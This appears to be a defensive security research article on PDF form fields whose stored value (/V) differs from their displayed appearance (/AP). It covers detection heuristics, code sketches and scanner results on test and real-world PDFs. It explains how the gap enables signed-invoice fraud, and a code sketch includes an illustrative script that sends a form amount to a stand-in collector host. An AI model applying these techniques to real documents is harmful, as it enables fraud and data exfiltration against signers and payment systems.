
Security Research — Published 24 May 2026

PDF Forms as Executable Security Boundaries

A PDF form field has two independent representations of its value: /V, the machine-readable data value that JavaScript reads and form submission posts, and /AP, the appearance stream that the viewer renders as pixels on screen. They are not derived from each other. A digital signature can certify both while they disagree. This is the V/AP problem — and it is structurally provable from the raw byte stream, without rendering.

Structural indicators documented in this article
  • /NeedAppearances true — when paired with a digital signature, the displayed appearance is regenerated from /V at open time and is never the signed /AP stream; what the viewer shows and what was certified have structurally different provenance
  • Checkbox and radio /V vs /AS divergence — the simplest V/AP check to verify: a pure dictionary key comparison
  • AP stream text extraction for text, listbox, and combobox fields — with /Opt export-value resolution and hex-string /V decoding
  • Field-value seeding in JavaScript behavioral analysis — why empty getField() returns cause conditional exploitation chains to be missed
  • DocMDP P=1 and DSS/LTV — the boundary ISO 32000-2 §12.8.2.2 draws between permitted and impermissible incremental updates

New — population-scale companion: PDF Forensics at Scale runs the scanner against 1,572 real-world PDFs — including 400 live malware samples — reporting live-malware detection, the real-world false-positive rate, and the files that crash a scanner (and how the engine was hardened).

Contents
  1. Background: Two Data Paths, One Signature
  2. Threat Perspective: Where V/AP Analysis Fits
  3. Five Structural Indicators: V/AP Divergence Without Rendering
  4. Live Detection: Nine Test PDFs, Real Scanner Output
  5. Normal Interactive PDFs vs. Suspicious Patterns
  6. JavaScript Field-Value Conditioning
  7. DocMDP P=1 and DSS/LTV
  8. Structural Limits: What Rasterisation Cannot Provide
  9. An Open Question: DocMDP P=2
  10. Safe Handling and Configuration
  11. Detection Methodology Reference
  12. Frequently Asked Questions
  13. Research References

Background: Two Data Paths, One Signature

In auditing the incremental-update logic in our PDF forensics scanner we identified a gap: the set-difference approach to injected object detection silently passed redefined objects carrying the same object ID. Fixing that led into a deeper examination of DocMDP — how certified signatures interact with permitted incremental updates. That work surfaced a more fundamental structural problem: the relationship between what a PDF AcroForm field displays and what it stores as machine-readable data. This article documents the V/AP problem in full.

Every AcroForm field has two independent data stores:

| Key | What it contains | Who reads it |
| --- | --- | --- |
| /V | The machine-readable field value | JavaScript (doc.getField().value), form submission (SubmitForm), digital signature byte-range hash |
| /AP /N | A self-contained PDF content stream that the viewer renders as pixels | The viewer, the user; nothing else |

These two stores are not derived from each other. A PDF author can set /V to (I agree to transfer $1,000) and author an /AP stream that renders I agree to transfer $10. The user signs what they see. The signature covers both. The signed content and the displayed content are structurally different by construction, inside the certified byte range.

Prior Research and Known Exploitation

The structural relationship between signed PDF content and rendered output has been studied in the academic literature. Mainka, Mladenov, Rohlmann, and Schwenk published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs” (NDSS 2021), identifying three attack classes — Hide, Hide-and-Replace, and Replace — that exploit the gap between the byte range a signature covers and the content the viewer renders. The disclosure reached 28 PDF viewer vendors and produced patches across Adobe Acrobat, Foxit, LibreOffice, and others. An earlier line of research by Müller, Mladenov, Somorovsky, and Schwenk (“PDF Insecurity” series, 2017–2019) systematically mapped signature-validation weaknesses across major PDF viewers, establishing the framework that later Shadow Attack work built on. ISO 32000-2:2020 introduced clarifications in response to some of these findings, though the V/AP structural separation itself is a fundamental consequence of the format’s design, not a defect that can be patched at the specification level.

In operational settings, the same mechanism is directly applicable to invoice fraud and signed financial workflows: a signed invoice PDF where an automated payment system reads /V while the human signer saw what /AP rendered. A field that displays “$1,200.00” to the signer while /V holds “$12,000.00” survives signature validation intact — no modification of the signed byte range is required, and no viewer warning is produced.

Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:

| CVE | Pattern | Mechanism |
| --- | --- | --- |
| CVE-2021-28550 (APSB21-29) | AcroForm + getField / setFocus JavaScript | Use-after-free in Acrobat’s form field manipulation path, triggered by specific getField() and setFocus() call sequences in AcroForm JavaScript |
| CVE-2021-21017 (APSB21-09) | XFA + JavaScript + instanceManager | Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat |
| CVE-2024-45112 (APSB24-70) | XFA/AcroForm mixed field access | Type confusion triggered when a document mixes XFA and AcroForm field access in the same session, a pattern not present in legitimately authored forms |
| CVE-2023-21608 (APSB23-01) | Annotation + event.target JavaScript | Use-after-free in the annotation engine triggered via event.target references in AcroForm field event handlers (CVSS 7.8) |

XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open. XFA scripting is structurally separate from AcroForm JavaScript: a scanner inspecting only AcroForm paths may not examine XFA-embedded FormCalc or JavaScript at all, since the execution model and content location differ between the two form architectures.

Threat Perspective: Where V/AP Analysis Fits

PDF-delivered threats exist across a wide spectrum of sophistication. The overwhelming majority of malicious PDFs observed in the wild do not involve form field structure at all. The high-volume threat classes are:

  • Phishing overlays — a rendered page that prompts for credentials or directs the user to an external URL. No AcroForm required; often no JavaScript.
  • Social engineering — instructions to enable content, call a number, scan a QR code, or download an attached file. Relies on user behavior, not structural manipulation.
  • JavaScript exploits targeting Acrobat’s engine — CVE-2008-2992, CVE-2009-0927, CVE-2018-4990, and more recent entries. These use JavaScript as a delivery mechanism but typically do not depend on form field data.
  • Embedded payloads via /EmbeddedFile streams, /Launch actions, or polyglot structures that contain executable content.

These are high-volume, operationally dominant attacks. They are detected through URL analysis, embedded file inspection, static JavaScript analysis, YARA pattern matching, and ClamAV signatures — not V/AP structural comparison. Commodity phishing PDFs do not need form field manipulation. They exploit user trust, not signing semantics.

V/AP divergence analysis is relevant to a different, narrower threat class: documents where the PDF form carries legal or financial authority, and where an attacker benefits from the gap between what a human reader sees and what a machine processes. The applicable scenarios are:

| Scenario | Why V/AP matters | Where simpler analysis is sufficient |
| --- | --- | --- |
| Signed financial contract | Signer’s view may differ from submitted field values; digital signature certifies both | Unsigned documents, including unsigned phishing documents, don’t need this analysis |
| Automated invoice processing | Payment pipeline reads /V for transaction amount; AP renders a different figure | Phishing invoices asking users to wire funds directly don’t need form manipulation |
| Regulatory or legal submission | The certified content is referenced by downstream systems as authoritative | Drive-by malware delivery doesn’t require form field structure |
| E-signature platform forensics | Contested signed documents require structural audit of what the byte range actually certified | Standard AV/EDR scanning handles most commodity threats at this layer |

Being explicit about scope is part of being accurate. The structural indicators in this article are most applicable to high-value signed document workflows and forensic analysis of contested PDFs. They are not the right primary tool for blocking commodity phishing PDFs, which are better addressed by URL reputation, sender analysis, and static JS inspection. Both are necessary; they target different points on the threat spectrum.

Five Structural Indicators: V/AP Divergence Without Rendering

The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.

/NeedAppearances True

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP from /V at open time. The /AP streams stored on disk are stale by construction: they may not reflect /V. On its own this is medium severity, because stale AP is common in programmatic form-fill workflows (mail-merge tools and e-signature platforms) that update /V but skip AP regeneration before saving. DocuSign-generated PDFs have been observed to carry /NeedAppearances true; this is observed behavior, not vendor-documented.

Combined with a digital signature it is critical. The byte-range hash covers the stale /AP, but the viewer regenerates the appearance from /V at open time, so what is displayed is never the signed /AP stream. The visual output may agree if /V and the stale /AP happen to contain the same value, but the provenance of what is displayed and what is certified is always structurally different.
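As a rough illustration of how this escalation can be read from raw bytes, the sketch below grades a file as medium when /NeedAppearances true is present and as critical when a signature marker is also present. The function name, the regular expressions, and the choice of /FT /Sig or /ByteRange as the signature marker are assumptions made for this example, not the scanner's actual code, and the sketch does not look inside compressed object streams.

```python
import re
from typing import Optional

# Hypothetical patterns for illustration; a real scanner would walk the object model.
NEED_APPEARANCES = re.compile(rb"/NeedAppearances\s+true\b")
SIGNATURE_HINT = re.compile(rb"/FT\s*/Sig\b|/ByteRange\s*\[")

def need_appearances_severity(pdf_bytes: bytes) -> Optional[str]:
    """Return None, 'medium', or 'critical' following the escalation described above."""
    if not NEED_APPEARANCES.search(pdf_bytes):
        return None
    # The flag alone is medium; the flag plus a signature marker is critical.
    return "critical" if SIGNATURE_HINT.search(pdf_bytes) else "medium"
```

Because the check is a byte-level search, it gives the same answer on every run and needs no viewer.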

Checkbox and Radio: /V vs /AS Key Comparison

For checkbox and radio button fields, /AS (Appearance State) selects which entry in /AP /N the viewer renders. /V is the stored data value. Both are name objects in the widget annotation dictionary. We extract both via regex against the xref object and compare them as strings — no rendering, no approximation.

If /V is /Yes and /AS is /Off, the displayed state and the stored value structurally disagree. That fact is in the file regardless of any viewer. This is the simplest V/AP check to verify: a pure dictionary key comparison.

In a signed document both /V and /AS fall within the signed byte range. The mismatch is by construction inside certified content.
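A minimal sketch of that comparison, assuming the widget dictionary has already been isolated as raw bytes. The helper name and the regular expressions are hypothetical; they illustrate the key comparison and are not the scanner's implementation.

```python
import re

# Name objects: a slash followed by characters up to a PDF delimiter or whitespace.
NAME_V = re.compile(rb"/V\s*/([^\s/<>\[\]()]+)")
NAME_AS = re.compile(rb"/AS\s*/([^\s/<>\[\]()]+)")

def checkbox_mismatch(widget_dict: bytes):
    """Return (V, AS) when both names exist and differ, otherwise None."""
    v = NAME_V.search(widget_dict)
    a = NAME_AS.search(widget_dict)
    if not v or not a:
        return None  # nothing to compare
    v_name = v.group(1).decode("latin-1")
    as_name = a.group(1).decode("latin-1")
    return (v_name, as_name) if v_name != as_name else None
```

For the widget in 02_checkbox_vap_mismatch.pdf as described in this article (/V /Yes, /AS /Off), a check of this shape reports the pair ("Yes", "Off").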

AP Stream Text Extraction: Text, Listbox, Combobox

For text fields, listboxes, and comboboxes, the /AP /N stream is a PDF content stream containing text drawing operators. We decompress it via PyMuPDF, extract Tj, TJ, and ' operators, reconstruct the display string, PDF-unescape it, whitespace-normalise it, and compare it to /V.
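The extraction step can be sketched as follows, assuming the content stream has already been decompressed (for example, the bytes PyMuPDF returns from Document.xref_stream). The function names and regular expressions are illustrative assumptions. The sketch handles literal strings only, does not support unescaped nested parentheses or hex strings inside the stream, and assumes a standard single-byte font encoding with no /Differences remap.

```python
import re

LITERAL = rb"\((?:\\.|[^\\()])*\)"
# Group 1: a literal string shown by Tj or '; group 2: the body of a TJ array.
SHOW = re.compile(rb"(" + LITERAL + rb")\s*(?:Tj|')|\[((?:\\.|[^\\\]])*)\]\s*TJ", re.S)
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
           b"(": b"(", b")": b")", b"\\": b"\\", b"\n": b""}

def unescape(literal: bytes) -> bytes:
    """Resolve PDF backslash escapes inside a parenthesised literal string."""
    def repl(m):
        c = m.group(1)
        if c[:1] in b"01234567":               # octal escape such as \101
            return bytes([int(c, 8) & 0xFF])
        return ESCAPES.get(c, c)               # unknown escapes keep the character
    return re.sub(rb"\\([0-7]{1,3}|.)", repl, literal[1:-1], flags=re.S)

def appearance_text(stream: bytes) -> str:
    """Concatenate the strings drawn by Tj, ' and TJ, then normalise whitespace."""
    parts = []
    for m in SHOW.finditer(stream):
        if m.group(1) is not None:
            parts.append(unescape(m.group(1)))
        else:
            parts.extend(unescape(s) for s in re.findall(LITERAL, m.group(2), flags=re.S))
    return " ".join(b"".join(parts).decode("latin-1").split())
```

The returned string is what gets compared against the decoded /V; an empty result means the stream draws no text at all.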

Three encoding cases are handled:

  • Literal string /V — /V (Hello) — extracted directly
  • Hex-string /V — /V <48656c6c6f> — decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
  • Listbox multi-select array — /V [(opt1) (opt2)] or [<hex1> <hex2>] — elements joined for comparison
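The three cases above can be sketched as a single decoder. The function names are hypothetical, escape sequences inside literal strings are left unresolved for brevity, and joining array elements with a single space is an assumption of this example (the article does not state the separator).

```python
import re

def decode_pdf_string(token: bytes) -> str:
    """Decode one literal (...) or hex <...> PDF string token."""
    token = token.strip()
    if token.startswith(b"<") and token.endswith(b">"):
        digits = re.sub(rb"\s+", b"", token[1:-1]).decode("ascii")
        if len(digits) % 2:
            digits += "0"                  # PDF pads an odd final hex digit with 0
        raw = bytes.fromhex(digits)
    else:
        raw = token[1:-1]                  # literal string; escapes not resolved here
    if raw.startswith(b"\xfe\xff"):        # UTF-16BE byte order mark
        return raw[2:].decode("utf-16-be")
    return raw.decode("latin-1")

def decode_field_value(v: bytes) -> str:
    """Decode /V whether it is a single string or a multi-select array."""
    v = v.strip()
    if v.startswith(b"["):
        items = re.findall(rb"\((?:\\.|[^\\()])*\)|<[0-9A-Fa-f\s]*>", v)
        return " ".join(decode_pdf_string(i) for i in items)
    return decode_pdf_string(v)
```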

For listbox and combobox fields, /Opt can store export/display pairs: [[(us) (United States)] [(uk) (United Kingdom)]]. In each pair ISO 32000 lists the export value first and the display text second. The /V holds the export value (us); the /AP renders the display label (United States). Without resolving this map, every legitimately authored dropdown using export-value pairs would fire a false positive. We build an export→display map from /Opt and substitute the display label as the comparison target before checking.
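A minimal sketch of the export-to-display resolution, assuming each two-element /Opt entry lists the export value first and the display text second, which is the order ISO 32000 defines for choice fields. The helper names and the regular expression are hypothetical, and escape sequences and hex strings are not handled.

```python
import re

# One nested pair: [ (export) (display) ]
PAIR = re.compile(rb"\[\s*\(((?:\\.|[^\\()])*)\)\s*\(((?:\\.|[^\\()])*)\)\s*\]")

def export_to_display(opt_array: bytes) -> dict:
    """Build {export value: display label} from the raw /Opt array."""
    inner = opt_array.strip()[1:-1]        # drop the outer brackets so flat arrays do not match
    return {m.group(1).decode("latin-1"): m.group(2).decode("latin-1")
            for m in PAIR.finditer(inner)}

def comparison_target(v: str, opt_array: bytes) -> str:
    """Return the label the AP stream is expected to render for the stored /V."""
    return export_to_display(opt_array).get(v, v)
```

When /Opt is a flat list of plain strings the map is empty and /V itself remains the comparison target.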

When the /AP stream exists but contains no text drawing operators at all, we flag it separately: the value is present in the file and covered by any signature, but the field renders blank to the viewer.

Value Set, No AP Defined

When /V is non-empty but no /AP stream exists, the viewer falls back to the field’s /DA (Default Appearance) and constructs a rendering itself. The displayed content is viewer-defined — it is not statically present in the file. Different viewers may render different things. Medium severity.
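The missing-AP and blank-AP conditions can be told apart with a small classifier like the sketch below. The state labels, the function name, and the operator patterns are assumptions for illustration; the input is the decompressed /AP /N stream, or None when the field has no /AP key.

```python
import re
from typing import Optional

TEXT_OP = re.compile(rb"[)>]\s*(?:Tj|')|\]\s*TJ")   # a string or array followed by a show operator
XOBJECT_OP = re.compile(rb"/[^\s/]+\s+Do\b")         # a named XObject invoked with Do

def appearance_state(has_value: bool, ap_stream: Optional[bytes]) -> str:
    """Classify how a field with a value is backed by its appearance stream."""
    if not has_value:
        return "no-value"
    if ap_stream is None:
        return "missing-ap"        # viewer falls back to /DA and builds its own rendering
    if TEXT_OP.search(ap_stream):
        return "text-ap"           # text is present and can be compared with /V
    if XOBJECT_OP.search(ap_stream):
        return "xobject-only-ap"   # Do present, text operators absent
    return "blank-ap"              # stream exists but draws no text
```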

Correlation Engine Compound Patterns

Four compound indicators in the weighted correlation engine (Engine 44 — Correlation Engine) fire on combinations:

| Combination | Severity | Why |
| --- | --- | --- |
| /NeedAppearances + digital signature | Critical | The signed bytes cover a stored /AP stream that the viewer does not display |
| V/AS mismatch + digital signature | Critical | Displayed state and certified value structurally differ within the same signed byte range |
| /NeedAppearances + JS or SubmitForm | High | Stale AP paired with active form content: the displayed values may differ from what is executed or exfiltrated |
| /NeedAppearances + DocMDP constraint violation | Critical | Uncertified modification rendered visible via viewer-regenerated appearance |
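The four combinations can be expressed as a small rule table. The sketch below is an illustration only: the Facts fields and the function name are hypothetical, and the engine's actual weights are not reproduced because the article does not state them.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Facts:
    """Per-file findings assumed to come from upstream checks (hypothetical names)."""
    need_appearances: bool = False
    signed: bool = False
    vas_mismatch: bool = False
    active_content: bool = False      # JavaScript or SubmitForm present
    docmdp_violation: bool = False

def compound_findings(f: Facts) -> list:
    """Return (severity, label) for every compound pattern that fires."""
    rules = [
        (f.need_appearances and f.signed, "critical", "/NeedAppearances + digital signature"),
        (f.vas_mismatch and f.signed, "critical", "V/AS mismatch + digital signature"),
        (f.need_appearances and f.active_content, "high", "/NeedAppearances + JS or SubmitForm"),
        (f.need_appearances and f.docmdp_violation, "critical",
         "/NeedAppearances + DocMDP constraint violation"),
    ]
    return [(severity, label) for hit, severity, label in rules if hit]
```

A file with /NeedAppearances true and no signature or active content produces an empty list, so only the standalone medium-severity indicator applies.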

Note on test scores: The Critical escalation for /NeedAppearances + digital signature fires only when both conditions are present in the same file. 01_need_appearances.pdf in the test corpus below carries no digital signature; it scores 81 (MEDIUM) — consistent with this table since the signature condition does not apply and the compound Critical indicator does not trigger.

Engine 47 aggregates findings from all upstream engines. V/AP indicators from Engine 25 (AcroForm Field Forensics) feed directly into it alongside signature forensics and JS behavioral emulation results. For the full 47-engine architecture, including how V/AP findings interact with the JS Behavioral Emulator (Engine 41) and Signature Forensics (Engine 21), see the scanner architecture documentation.

Live Detection: Nine Test PDFs, Real Scanner Output

Each structural indicator described above was validated against a minimal hand-crafted PDF targeting that specific condition. One additional control file was built with correctly authored, matching V and AP values to check for false positives. All files were built from raw bytes without any PDF library and submitted to the scanner live. File sizes range from 707 to 1,212 bytes.

| Test file | Condition planted | Threat · Deception → Verdict | Indicators (n / severity) | Primary indicator fired |
| --- | --- | --- | --- | --- |
| 01_need_appearances.pdf (758 bytes) | /NeedAppearances true in AcroForm dict; text field with /V (12000.00), no /AP | 0 · 20 → suspicious | 6 total: 4 medium · 2 low | [MEDIUM] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale |
| 02_checkbox_vap_mismatch.pdf (941 bytes) | Checkbox widget: /V /Yes but /AS /Off | 0 · 25 → suspicious | 4 total: 1 high · 1 medium · 2 low | [HIGH] AcroForm: Checkbox Field “approved” — Value/Appearance State Mismatch (V=Yes, AS=Off) |
| 03_text_vap_mismatch.pdf (913 bytes) | Text field: /V (Rejected); AP stream renders “Approved” | 0 · 25 → suspicious | 4 total: 1 high · 1 medium · 2 low | [HIGH] AcroForm: Text Field “status” — Value/Appearance Mismatch |
| 05_missing_ap.pdf (742 bytes) | Text field: /V (99750.00), no /AP key defined | 0 · 10 → suspicious | 5 total: 3 medium · 2 low | [MEDIUM] AcroForm: Text Field “total_amount” — Has Value But No Appearance Stream |
| 06_js_field_conditioning.pdf (1,166 bytes) | OpenAction JS reading status (/V approved) and conditionally posting amount (/V 75000.00) to external URL | 260 · 20 → high-risk | 14 total: 5 critical · 2 high · 5 medium · 2 low | [CRITICAL] OpenAction + JavaScript; [CRITICAL] YARA: Auto-Open + Executable |
| 07_need_appearances_signed.pdf (1,206 bytes) | /NeedAppearances true + structural /Sig field + /DocMDP P=2; text field /V (12000.00), no /AP | 260 · 110 → high-risk | 17 total: 4 critical · 4 high · 6 medium · 3 low | [CRITICAL] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale; [CRITICAL] NeedAppearances + Digital Signature — Certified Content Diverges from Displayed |
| E4_image_ap_structural.pdf (938 bytes) | Text field /V (1200.00); AP stream is an image XObject invoked via Do; no text operators present | 0 · 25 → suspicious | 5 total: 1 high · 2 medium · 2 low | [HIGH] AcroForm: Text Field “amount” — Image-Based Appearance Stream (V Not Visually Verifiable) |
| E5_fieldmdp_empty_fields.pdf (1,212 bytes) | FieldMDP signature with Action=Include and empty /Fields [] array; appears to lock named fields but locks none | 245 · 10 → high-risk | 14 total: 2 critical · 4 high · 5 medium · 3 low | [HIGH] FieldMDP: Include Action With Empty /Fields — Locks Nothing |
| 00_clean_match.pdf (707 bytes, control) | Text field: /V (1200.00); AP stream renders 1200.00 via Tj operator; values agree; no /NeedAppearances | 0 · 0 → clean | 4 total: 0 V/AP · 0 threat · structural only | No V/AP indicator fired and no threat: the control is correctly clean. The unrelated factors that previously elevated it (empty metadata, and a benign differential-parsing disagreement where MuPDF sees no AcroForm while Poppler/pdfminer do) are now booked to the neutral structural axis and do not affect the verdict. The V/AP structural checks correctly stay silent on a well-formed document. |

The differential-parsing disagreement on the control file is itself empirically meaningful: Poppler and pdfminer agree on the presence of an AcroForm in a file that MuPDF treats as having none, so a parser-disagreement indicator fires on a legitimately authored, benign document.

Five scanner findings from the above runs are reproduced verbatim below.

Finding 1 — Text Field V/AP Mismatch

Severity:  HIGH
Indicator: AcroForm: Text Field "status" — Value/Appearance Mismatch
Engine:    AcroForm Field Forensics

Field "status" (xref 5): /V stores "Rejected" but the /AP /N appearance stream
(xref 7) renders "Approved". The viewer displays "Approved"; any form submission,
JavaScript getField() read, or digital signature byte-range will reference
"Rejected". The structural disagreement is provable from the raw PDF object model
without rendering.

Finding 2 — Checkbox V/AS Mismatch

Severity:  HIGH
Indicator: AcroForm: Checkbox Field "approved" — Value/Appearance State Mismatch
           (V=Yes, AS=Off)
Engine:    AcroForm Field Forensics

Field "approved" (xref 5): /V is /Yes (the stored data value) but /AS is /Off
(the appearance-state key that selects which /AP /N entry the viewer renders).
The checkbox appears unchecked to the viewer; the stored value is checked. Both
/V and /AS fall within any signed byte range — the mismatch is by construction
inside certified content.

Finding 3 — Field-Value Seeding in the JS Emulator

The JS field-conditioning test PDF reached a threat score of 260 (high-risk) on static analysis alone. It is held at high-risk rather than dangerous because, although “OpenAction + JavaScript” is a confirmed attack chain, the threat score stays under the dangerous band; its aggregate across all axes is 456. The relevant emulator context: Engine 25 (AcroForm Field Forensics) extracted field_values = {"status": "approved", "amount": "75000.00"} from the AcroForm field dictionaries and passed them to the JS emulator stub. Without this seeding, doc.getField('status').value returns ''; the condition '' == 'approved' is false; the app.launchURL() branch is never taken, and the emulator reports clean. With real field values, the condition evaluates correctly and any URL-launch or submit event is emitted with the actual exfiltration payload.
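The effect of seeding can be shown with a toy model. The sketch below is a Python transliteration of a hypothetical conditional script, not the emulator itself; the stub classes, the script body, and the collector.example URL are invented for illustration.

```python
class FieldStub:
    def __init__(self, value: str = ""):
        self.value = value

class DocStub:
    """Stands in for the JavaScript doc object; unseeded fields read as ''."""
    def __init__(self, field_values=None):
        self._values = dict(field_values or {})

    def getField(self, name: str) -> FieldStub:
        return FieldStub(self._values.get(name, ""))

class AppStub:
    """Stands in for the JavaScript app object and records emitted events."""
    def __init__(self):
        self.events = []

    def launchURL(self, url: str) -> None:
        self.events.append(("launchURL", url))

def run_open_action(doc: DocStub, app: AppStub) -> list:
    # Hypothetical script: exfiltrate the amount only when status is 'approved'.
    if doc.getField("status").value == "approved":
        app.launchURL("https://collector.example/?a=" + doc.getField("amount").value)
    return app.events
```

Run with an empty DocStub, the branch is skipped and no event is recorded; run with the extracted field values, the launchURL event carries the stored amount.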

Finding 4 — Image-Based AP Structural Flag

Severity:  HIGH
Indicator: AcroForm: Text Field "amount" — Image-Based Appearance Stream
           (V Not Visually Verifiable)
Engine:    AcroForm Field Forensics

Field "amount": /V stores "1200.00" but the /AP /N stream (xref 5) contains
only a Do operator invoking an image XObject (xref 6) — no Tj or TJ text
operators are present. The viewer renders a rasterised image; the stored /V
value is not derivable from the AP stream without image recognition. The
structural anomaly is deterministic: Do present, text operators absent.
Manual review required to confirm whether the image content matches /V.

Finding 5 — FieldMDP Include Action With Empty Fields

Severity:  HIGH
Indicator: FieldMDP: Include Action With Empty /Fields — Locks Nothing
Engine:    Named Tree and Action Forensics

/TransformMethod /FieldMDP with Action=Include and /Fields []. An Include
action with an explicit field list locks only the named fields; an empty
list locks none. The signature structure certifies the document while
leaving every AcroForm field modifiable post-signing. Validators that
check for FieldMDP presence without inspecting the locked-field set will
report a valid field-integrity certification that provides none.
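A check of this shape can be sketched against the raw bytes of a signature reference dictionary. The function name and patterns are assumptions for illustration; the sketch only treats an explicitly empty /Fields array as the flagged case, matching the condition in the finding above.

```python
import re

FIELDMDP = re.compile(rb"/TransformMethod\s*/FieldMDP\b")
ACTION = re.compile(rb"/Action\s*/(All|Include|Exclude)\b")
FIELDS = re.compile(rb"/Fields\s*\[([^\]]*)\]")

def fieldmdp_locks_nothing(sigref: bytes) -> bool:
    """True when FieldMDP uses Action=Include with an explicitly empty /Fields array."""
    if not FIELDMDP.search(sigref):
        return False
    action = ACTION.search(sigref)
    fields = FIELDS.search(sigref)
    return bool(
        action and action.group(1) == b"Include"
        and fields is not None and not fields.group(1).strip()
    )
```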

A note on the scores: every V/AP positive here carries no execution vector, so its threat score is ~0 — it is the Deception (content-integrity) axis that grades them, which is why each reads suspicious or high-risk on its V/AP or signature finding rather than being dismissed as low. The signature-tampering cases (07, E5) grade on the integrity portion of the threat axis. Production forms behave identically: low/zero threat, and the V/AP checks stay silent unless value and appearance genuinely diverge.

Complete Corpus: False-Positive and False-Negative Testing

196 PDF files were submitted to the scanner across six categories: hand-crafted V/AP positive and negative test files, real-world US government tax and agency forms, US federal legislation, academic papers, and Corkami proof-of-concept adversarial files (deliberately malformed or structurally unusual PDFs used for PDF parser research). All 196 were successfully scanned (the blank-AP edge case that previously returned no usable response now scans cleanly and fires its V/AP indicator). All predictions for positive test files were stated before scanning.

| Category | Files | Prediction | Result |
| --- | --- | --- | --- |
| Structural V/AP positive cases (hand-crafted) | 9 scanned | V/AP indicator should fire | 9 / 9 detected (100%) |
| Evasion: hex-encoded /V (E1) | 1 | Hex-decode handles this; should detect | Detected [HIGH] Value/Appearance Mismatch |
| Evasion: Unicode confusable in /V (E2) | 1 | Byte-level comparison catches it; should detect | Detected [HIGH] Value/Appearance Mismatch |
| Evasion: font encoding remap (E3) | 1 | Font glyph table now parsed; should detect | Detected [HIGH] Value/Appearance Mismatch. /Encoding /Differences resolved; rendered text 9200.00 vs /V 1200.00. Deception 75 → high-risk. |
| Hand-crafted clean controls (text, checkbox, listbox) | 3 | No V/AP indicator | 0 / 3 false positives |
| Tool-generated clean PDFs (qpdf, pdflatex, wkhtmltopdf) | 3 | No V/AP indicator | 0 / 3 false positives |
| IRS tax forms: 44 real AcroForm documents. W-9, W-4, 1040, 941, 1120, 1065, 433-A, 1099-NEC, and 37 others. Real JavaScript (field calculations), embedded files, XFA fields, ObjStm. Under the multi-axis verdict these now correctly read low (threat 20–45): their JavaScript, embedded files and XFA are neutral form-authoring capability on the structural axis, not threat, with zero V/AP indicators. (An earlier single-score model rated the same forms 328–486/“suspicious”; correcting that false elevation while keeping V/AP silent is exactly what the axis split achieves.) | 44 | No V/AP indicator | 0 / 44 false positives |
| US agency forms (VA-10091, VA-40-1330) | 2 | No V/AP indicator | 0 / 2 false positives |
| US federal legislation (GovInfo PDFs): Infrastructure Investment and Jobs Act, Consolidated Appropriations Act 2021, Tax Cuts and Jobs Act 2017, CARES Act. | 4 | No V/AP indicator | 0 / 4 false positives |
| Academic papers from arXiv: 29 documents. Range of 2023–2025 papers across CS, physics, and mathematics. Standard pdflatex output; no AcroForms. | 29 | No V/AP indicator | 0 / 29 false positives |
| Corkami PDF PoC adversarial files: 102 documents. Deliberately malformed or structurally unusual PDFs: truncated xrefs, PDF version mismatches, orphaned objects, compressed object streams, JavaScript obfuscation, signature edge cases, encoding tricks. Used for differential-parser research. | 102 | No V/AP indicator | 0 / 102 false positives |

| Metric | Value | Scope caveat |
| --- | --- | --- |
| V/AP detection rate | 9 / 9 (100%) | All 9 positive cases scanned and detected (the blank-AP edge case now scans cleanly and fires its V/AP indicator); 0 false negatives after font-encoding-remap fix |
| False-positive rate | 0 / 187 (0.00%) | Across 44 IRS forms, 2 agency forms, 4 federal publications, 29 arXiv papers, 102 Corkami PoC files, 6 hand-crafted and tool-generated clean controls |
| Confirmed false negatives | 0 | E3 font encoding remap was the only known FN; now detected after /Encoding /Differences glyph table resolution was added to AP text extraction |
| Evasion attempts tested | 3 built and scanned; 1 additional structural test | E1 detected, E2 detected, E3 detected (after fix); image-based AP structurally detected (Do operator without text operators); whitespace normalisation and encrypted AP remain outside scope |
| Independent replication | None | All tests by the authors; test files and generation scripts available for independent replication |

A noteworthy secondary finding concerns how those 44 IRS forms are scored overall. They carry JavaScript field-calculation objects, embedded file attachments, XFA form structures and ObjStm compressed object streams — all legitimate interactive-form authoring features. Under the multi-axis verdict these are classified as neutral capability on the structural axis, not threat, so all 44 forms now score low (threat 20–45) with zero V/AP indicators. An earlier single-score model summed those same features into 328–486 points and rated the forms suspicious, then relied on a special-case “form-document context gate” to walk the level back — a patch over a scoring model that conflated capability with threat. The axis split removes the need for that gate: presence of form JavaScript or embedded files no longer inflates the malware verdict in the first place, while the V/AP checks remain free to fire the instant a field’s value and appearance genuinely diverge. The checks correctly separate AcroForm field-value divergence (content integrity) from the active-content capability that legitimately authored government forms routinely carry.

The 102 Corkami PoC adversarial files include PDFs with intentionally broken structure: orphaned xref tables, version header mismatches across parsers, compressed object streams, obfuscated JavaScript, and signature edge cases. None triggered a V/AP indicator. The checks require an AcroForm widget with both /V and /AP keys present — a combination structurally absent from the deliberately minimal Corkami test files.

This is engineering validation on a controlled corpus, not a formal empirical study. The 0/187 false-positive rate covers 187 files across six distinct source categories; the 9/9 detection rate covers all scanned positive cases only. Neither figure generalises to the full population of PDF documents in production environments at scale. Academic validation would require a labelled corpus drawn from operational traffic, independent replication, and statistical significance analysis. That gap is real and is stated here rather than papered over.
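To put a rough number on why a 0/187 result does not generalise, the sketch below computes the exact one-sided upper confidence bound for a rate when zero events are observed in n trials. It assumes the files are independent draws from the population of interest, which this hand-assembled corpus is not, so the figure is a best case rather than a guarantee. The function name is hypothetical.

```python
def zero_event_upper_bound(n: int, confidence: float = 0.95) -> float:
    """Largest rate p still consistent with 0 events in n independent trials.

    Solves (1 - p) ** n = 1 - confidence for p.
    """
    return 1.0 - (1.0 - confidence) ** (1.0 / n)

# With n = 187 and 95% confidence the bound is roughly 0.016, i.e. about 1.6%.
bound = zero_event_upper_bound(187)
```

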